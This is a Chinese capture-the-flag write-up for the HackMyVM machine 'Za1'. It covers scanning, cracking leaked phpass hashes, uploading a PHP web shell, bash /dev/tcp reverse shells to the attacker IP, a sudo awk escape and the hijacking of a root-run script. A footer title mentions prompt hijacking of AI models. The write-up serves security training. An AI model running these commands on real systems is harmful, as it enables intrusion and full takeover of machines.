HakcMyVM-Za1

信息搜集

主机发现

复制代码
┌──(kali㉿kali)-[~]
└─$ nmap -sn 192.168.21.0/24
Starting Nmap 7.95 ( https://nmap.org ) at 2026-02-08 09:15 EST
Nmap scan report for 192.168.21.6
Host is up (0.00033s latency).
MAC Address: 08:00:27:C0:12:8B (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.21.7
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.92 seconds

端口扫描

复制代码
┌──(kali㉿kali)-[~]
└─$ nmap -A -p- 192.168.21.6
Starting Nmap 7.95 ( https://nmap.org ) at 2026-02-08 09:17 EST
Nmap scan report for 192.168.21.6
Host is up (0.00028s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 36:32:5b:78:d0:f4:3c:9f:05:1a:a7:13:91:3e:38:c1 (RSA)
|   256 72:07:82:15:26:ce:13:34:e8:42:cf:da:de:e2:a7:14 (ECDSA)
|_  256 fc:9c:66:46:86:60:1a:29:32:c6:1f:ec:b2:47:b8:74 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-generator: Typecho 1.2.1
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Zacarx's blog
MAC Address: 08:00:27:C0:12:8B (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.28 ms 192.168.21.6

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.98 seconds

漏洞利用

80端口是一个blog,目录扫描

复制代码
┌──(kali㉿kali)-[~]
└─$ gobuster dir -u http://192.168.21.6 -w SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt -x html,php,txt,zip,git,jpg,png
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.21.6
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              png,html,php,txt,zip,git,jpg
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 277]
/index.php            (Status: 200) [Size: 6806]
/.php                 (Status: 403) [Size: 277]
/admin                (Status: 301) [Size: 312] [--> http://192.168.21.6/admin/]                                                          
/install              (Status: 301) [Size: 314] [--> http://192.168.21.6/install/]                                                        
/install.php          (Status: 302) [Size: 0] [--> http://192.168.21.6/]                                                                  
/sql                  (Status: 301) [Size: 310] [--> http://192.168.21.6/sql/]                                                            
/var                  (Status: 301) [Size: 310] [--> http://192.168.21.6/var/]                                                            
/usr                  (Status: 301) [Size: 310] [--> http://192.168.21.6/usr/]                                                            
/.php                 (Status: 403) [Size: 277]
/.html                (Status: 403) [Size: 277]
/server-status        (Status: 403) [Size: 277]
/logitech-quickcam_w0qqcatrefzc5qqfbdz1qqfclz3qqfposz95112qqfromzr14qqfrppz50qqfsclz1qqfsooz1qqfsopz1qqfssz0qqfstypez1qqftrtz1qqftrvz1qqftsz2qqnojsprzyqqpfidz0qqsaatcz1qqsacatzq2d1qqsacqyopzgeqqsacurz0qqsadisz200qqsaslopz1qqsofocuszbsqqsorefinesearchz1.html (Status: 403) [Size: 277]
Progress: 9482032 / 9482040 (100.00%)
===============================================================
Finished
===============================================================
┌──(kali㉿kali)-[~]
└─$ gobuster dir -u http://192.168.21.6/sql -w SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt -x sql,sql.gz,sql.zip,sql.bak,sql.old,sql.backup
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.21.6/sql
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              sql.gz,sql.zip,sql.bak,sql.old,sql.backup,sql
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/new.sql              (Status: 200) [Size: 102400]

把new.sql下载下来看一下发现暴露了版本

用sqlite3打开

复制代码
┌──(kali㉿kali)-[~]
└─$ sqlite3 new.sql
SQLite version 3.46.1 2024-08-13 09:16:08
Enter ".help" for usage hints.
sqlite> .tables
typechocomments       typechometas          typechousers        
typechocontents       typechooptions      
typechofields         typechorelationships
sqlite> select * from typechousers;
1|zacarx|$P$BhtuFbhEVoGBElFj8n2HXUwtq5qiMR.|zacarx@qq.com|http://www.zacarx.com|zacarx|1690361071|1692694072|1690364323|administrator|9ceb10d83b32879076c132c6b6712318
2|admin|$P$BERw7FPX6NWOVdTHpxON5aaj8VGMFs0|admin@11.com||admin|1690364171|1690365357|1690364540|administrator|5664b205a3c088256fdc807791061a18

爆破一下

复制代码
┌──(kali㉿kali)-[~]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt 1
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (phpass [phpass ($P$ or $H$) 128/128 AVX 4x3])
Cost 1 (iteration count) is 8192 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
123456           (admin)

在/admin登录,在设置中设置允许上传php文件,然后传入我们的shell

上传一个php文件,尝试访问

执行反弹shell:http://192.168.21.6/usr/uploads/2026/02/3848067895.php?cmd=bash -c 'bash -i >%26 /dev/tcp/192.168.21.7/1234 0>%261'

复制代码
┌──(kali㉿kali)-[~]
└─$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [192.168.21.7] from (UNKNOWN) [192.168.21.6] 36684
bash: cannot set terminal process group (1160): Inappropriate ioctl for device
bash: no job control in this shell
www-data@za_1:/var/www/html/usr/uploads/2026/02$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

权限提升

可以不需要密码执行awk,awk是一门脚本语言,内建函数system("command")可以直接执行系统命令。

复制代码
www-data@za_1:/var/www$ sudo -l
sudo -l
Matching Defaults entries for www-data on za_1:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on za_1:
    (za_1) NOPASSWD: /usr/bin/awk
www-data@za_1:/var/www$ sudo -u za_1 /usr/bin/awk 'BEGIN {system("/bin/bash")}'
< -u za_1 /usr/bin/awk 'BEGIN {system("/bin/bash")}'
id
uid=1000(za_1) gid=1000(za_1) groups=1000(za_1),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)
za_1@za_1:~$ ls -la
ls -la
total 44
drwxr-xr-x 6 za_1 za_1 4096 Aug 22  2023 .
drwxr-xr-x 3 root root 4096 Jul 26  2023 ..
lrwxrwxrwx 1 za_1 za_1    9 Aug 22  2023 .bash_history -> /dev/null
-rw-r--r-- 1 za_1 za_1  220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 za_1 za_1 3771 Apr  4  2018 .bashrc
drwx------ 2 za_1 za_1 4096 Jul 26  2023 .cache
drwx------ 3 za_1 za_1 4096 Jul 26  2023 .gnupg
-rw-r--r-- 1 za_1 za_1  807 Apr  4  2018 .profile
drwxr-xr-x 2 za_1 za_1 4096 Jul 26  2023 .root
drwx------ 2 za_1 za_1 4096 Jul 26  2023 .ssh
-rw-r--r-- 1 za_1 za_1    0 Jul 26  2023 .sudo_as_admin_successful
-rw------- 1 za_1 za_1  991 Jul 26  2023 .viminfo
-rw-r--r-- 1 za_1 za_1   23 Jul 26  2023 user.txt
za_1@za_1:~$ cd .root
cd .root
za_1@za_1:~/.root$ ls -la
ls -la
total 12
drwxr-xr-x 2 za_1 za_1 4096 Jul 26  2023 .
drwxr-xr-x 6 za_1 za_1 4096 Aug 22  2023 ..
-rwxrwxrwx 1 root root  117 Jul 26  2023 back.sh
za_1@za_1:~/.root$ cat back.sh
cat back.sh
#!/bin/bash


cp /var/www/html/usr/64c0dcaf26f51.db /var/www/html/sql/new.sql

bash -i >&/dev/tcp/10.0.2.18/999 0>&1

我们把私钥写入/.ssh/authorized_keys,然后ssh重新连接

复制代码
za_1@za_1:~/.root$ nano back.sh 
za_1@za_1:~/.root$ cat back.sh 
#!/bin/bash

cp /var/www/html/usr/64c0dcaf26f51.db /var/www/html/sql/new.sql

bash -i >&/dev/tcp/192.168.21.7/1234 0>&1

echo '#!/bin/bash' > back.sh
┌──(kali㉿kali)-[~]
└─$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [192.168.21.7] from (UNKNOWN) [192.168.21.6] 42954
bash: cannot set terminal process group (4448): Inappropriate ioctl for device
bash: no job control in this shell
root@za_1:~# id
id
uid=0(root) gid=0(root) groups=0(root)
相关推荐
学逆向的2 小时前
汇编——修改EIP的值
开发语言·汇编·网络安全
零零信安17 小时前
AI智能体,攻守失衡的催化剂 | 零零信安
人工智能·网络安全·数据泄露·暗网·零零信安
白帽小阳17 小时前
2026前端面试题!(附答案及解析)
javascript·网络·python·安全·web安全·网络安全·护网行动
白帽小阳19 小时前
[特殊字符]【2026最新】零基础入门学网络安全(详细路线图),看这篇就够了!
学习·安全·web安全·网络安全·安全运营·学习路线·web渗透
HackTwoHub1 天前
AI大模型攻击思路,涵盖提示词劫持、知识库投毒、多语种混淆 + 身份伪装、诱导 AI 输出涉密后台核心配置
人工智能·安全·web安全·网络安全·自动化·系统安全·安全架构
Eastmount1 天前
[论文阅读] (51)ESWA25 基于启发式优化器的入侵检测系统
论文阅读·网络安全·sci·入侵检测·eswa
白帽小阳1 天前
Typora插件开发指南:打造专属IDE式写作环境
c语言·网络·python·网络安全·github·pygame·护网行动
Sagittarius_A*1 天前
Web 渗透信息收集实战:站点指纹识别与目录扫描
网络安全·渗透测试·kali
m0_738120722 天前
PHP代码审计基础——超全局变量(三)
开发语言·安全·网络安全·php
其实防守也摸鱼3 天前
运维--怎么看接口的请求和返回
运维·学习·网络安全·网络攻击模型·burpsuite·攻防对抗·蓝队